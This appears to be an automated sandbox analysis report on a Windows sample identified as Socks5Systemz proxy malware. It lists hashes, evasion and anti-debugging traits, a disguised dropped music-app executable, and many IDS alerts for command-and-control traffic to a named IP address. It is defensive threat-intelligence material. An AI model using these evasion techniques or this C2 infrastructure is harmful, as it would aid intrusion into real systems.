Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1417474
MD5:f306ea1faa91611b7bc26e9cc0bd3956
SHA1:accc3aa32f33273b46765d024c0cb16cc8463486
SHA256:ff66d8e75eccb014fd09adc9045bd1630219def9a7635d4a9ac382466eb7f435
Tags:exe
Infos:

Detection

Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Socks5Systemz
Contains functionality to infect the boot sector
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6300 cmdline: "C:\Users\user\Desktop\file.exe" MD5: F306EA1FAA91611B7BC26E9CC0BD3956)
    • file.tmp (PID: 5004 cmdline: "C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp" /SL5="$20446,1681617,54272,C:\Users\user\Desktop\file.exe" MD5: 8E02BC0DF97F95A1DF3FD1EEE341C73F)
      • metatoggermusiccollection.exe (PID: 5888 cmdline: "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -i MD5: CC6DE23FFDBD2BC10F9CFD9E44659A2D)
      • metatoggermusiccollection.exe (PID: 6408 cmdline: "C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe" -s MD5: CC6DE23FFDBD2BC10F9CFD9E44659A2D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.3216353053.00000000025B9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000004.00000002.3216460127.0000000002AD1000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
      Process Memory Space: metatoggermusiccollection.exe PID: 6408JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:03/29/24-12:09:45.420994
        SID:2049467
        Source Port:49712
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:33.201024
        SID:2049467
        Source Port:49773
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:31.266790
        SID:2049467
        Source Port:49770
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:50.438859
        SID:2049467
        Source Port:49718
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:29.343836
        SID:2049467
        Source Port:49767
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:25.092185
        SID:2049467
        Source Port:49761
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:35.156161
        SID:2049467
        Source Port:49776
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:45.795139
        SID:2049467
        Source Port:49788
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:42.173450
        SID:2049467
        Source Port:49785
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:52.762235
        SID:2049467
        Source Port:49721
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:37.498093
        SID:2049467
        Source Port:49779
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:49.656205
        SID:2049467
        Source Port:49794
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:10.485514
        SID:2049467
        Source Port:49746
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:16.841602
        SID:2049467
        Source Port:49752
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:47.724356
        SID:2049467
        Source Port:49791
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:39.408449
        SID:2049467
        Source Port:49782
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:21.519109
        SID:2049467
        Source Port:49758
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:19.594654
        SID:2049467
        Source Port:49755
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:14.920798
        SID:2049467
        Source Port:49749
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:27.424287
        SID:2049467
        Source Port:49764
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:58.919317
        SID:2049467
        Source Port:49728
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:20.874262
        SID:2049467
        Source Port:49757
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:43.222189
        SID:2049467
        Source Port:49786
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:38.127296
        SID:2049467
        Source Port:49780
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:53.388422
        SID:2049467
        Source Port:49722
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:26.780979
        SID:2049467
        Source Port:49763
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:53.501609
        SID:2049467
        Source Port:49800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:30.625360
        SID:2049467
        Source Port:49769
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:52.218008
        SID:2049467
        Source Port:49798
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:49.624355
        SID:2049467
        Source Port:49716
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:07.520008
        SID:2049467
        Source Port:49740
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:34.518099
        SID:2049467
        Source Port:49775
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:03.645340
        SID:2049467
        Source Port:49734
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:26.142227
        SID:2049467
        Source Port:49762
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:02.989420
        SID:2049467
        Source Port:49733
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:29.982779
        SID:2049467
        Source Port:49768
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:51.565445
        SID:2049467
        Source Port:49797
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:06.876572
        SID:2049467
        Source Port:49739
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:33.860666
        SID:2049467
        Source Port:49774
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:58.280004
        SID:2049467
        Source Port:49727
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:16.200826
        SID:2049467
        Source Port:49751
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:48.356929
        SID:2049467
        Source Port:49792
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:08.153311
        SID:2049467
        Source Port:49741
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:09.844842
        SID:2049467
        Source Port:49744
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:04.284502
        SID:2049467
        Source Port:49735
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:52.864072
        SID:2049467
        Source Port:49799
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:49.012408
        SID:2049467
        Source Port:49793
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:17.904399
        SID:2049467
        Source Port:49753
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:59.565419
        SID:2049467
        Source Port:49729
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:20.232000
        SID:2049467
        Source Port:49756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:06.232200
        SID:2049467
        Source Port:49738
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:11.167852
        SID:2049467
        Source Port:49747
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:38.765184
        SID:2049467
        Source Port:49781
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:47.079531
        SID:2049467
        Source Port:49790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:52.123640
        SID:2049467
        Source Port:49720
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:41.536693
        SID:2049467
        Source Port:49784
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:43.860067
        SID:2049467
        Source Port:49787
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:57.218726
        SID:2049467
        Source Port:49726
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:36.862357
        SID:2049467
        Source Port:49778
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:15.568464
        SID:2049467
        Source Port:49750
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:54.451755
        SID:2049467
        Source Port:49723
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:02.326674
        SID:2049467
        Source Port:49732
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:50.920566
        SID:2049467
        Source Port:49796
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:55.746985
        SID:2049467
        Source Port:49725
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:18.951435
        SID:2049467
        Source Port:49754
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:46.435554
        SID:2049467
        Source Port:49789
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:40.888750
        SID:2049467
        Source Port:49783
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:01.265583
        SID:2049467
        Source Port:49731
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:50.283368
        SID:2049467
        Source Port:49795
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:05.594232
        SID:2049467
        Source Port:49737
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:51.076317
        SID:2049467
        Source Port:49719
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:13.452004
        SID:2049467
        Source Port:49748
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:31.920222
        SID:2049467
        Source Port:49771
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:28.703817
        SID:2049467
        Source Port:49766
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:00.203383
        SID:2049467
        Source Port:49730
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:32.566269
        SID:2049467
        Source Port:49772
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:55.106879
        SID:2049467
        Source Port:49724
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:28.062365
        SID:2049467
        Source Port:49765
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:09:48.936277
        SID:2049467
        Source Port:49713
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:36.217358
        SID:2049467
        Source Port:49777
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:22.983300
        SID:2049467
        Source Port:49759
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:09.201668
        SID:2049467
        Source Port:49742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:23.628743
        SID:2049467
        Source Port:49760
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:03/29/24-12:10:04.939736
        SID:2049467
        Source Port:49736
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus / Scanner detection for submitted sample
        Source: file.exeAvira: detected
        Multi AV Scanner detection for domain / URL
        Source: http://45.142.214.240/Virustotal: Detection: 7%Perma Link
        Multi AV Scanner detection for submitted file
        Source: file.exeVirustotal: Detection: 8%Perma Link
        Machine Learning detection for dropped file
        Source: C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeJoe Sandbox ML: detected
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0045B4AC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,1_2_0045B4AC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0045B560 ArcFourCrypt,1_2_0045B560
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0045B578 ArcFourCrypt,1_2_0045B578
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_10001000 ISCryptGetVersion,1_2_10001000
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_10001130 ArcFourCrypt,1_2_10001130

        Compliance

        barindex
        Detected unpacking (overwrites its own PE header)
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeUnpacked PE file: 3.2.metatoggermusiccollection.exe.400000.0.unpack
        Source: C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exeUnpacked PE file: 4.2.metatoggermusiccollection.exe.400000.0.unpack
        Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0047A44C FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_0047A44C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0047077C FindFirstFileA,FindNextFileA,FindClose,1_2_0047077C
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004513E4 FindFirstFileA,GetLastError,1_2_004513E4
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_004601DC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_004601DC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00478334 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,1_2_00478334
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00460658 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00460658
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_0045EC50 FindFirstFileA,FindNextFileA,FindClose,1_2_0045EC50
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpCode function: 1_2_00491EBC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_00491EBC
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\userJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppData\RoamingJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmpFile opened: C:\Users\user\AppDataJump to behavior

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49712 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49713 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49716 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49718 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49719 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49720 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49721 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49722 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49723 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49724 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49725 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49726 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49727 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49728 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49729 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49730 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49731 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49732 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49733 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49734 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49735 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49736 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49737 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49738 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49739 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49740 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49741 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49742 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49744 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49746 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49747 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49748 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49749 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49750 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49751 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49752 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49753 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49754 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49755 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49756 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49757 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49758 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49759 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49760 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49761 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49762 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49763 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49764 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49765 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49766 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49767 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49768 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49769 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49770 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49771 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49772 -> 45.142.214.240:80
        Source: TrafficSnort IDS: 2049467 ET TROJAN [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 192.168.2.5:49773 -> 45.142.214.240:80
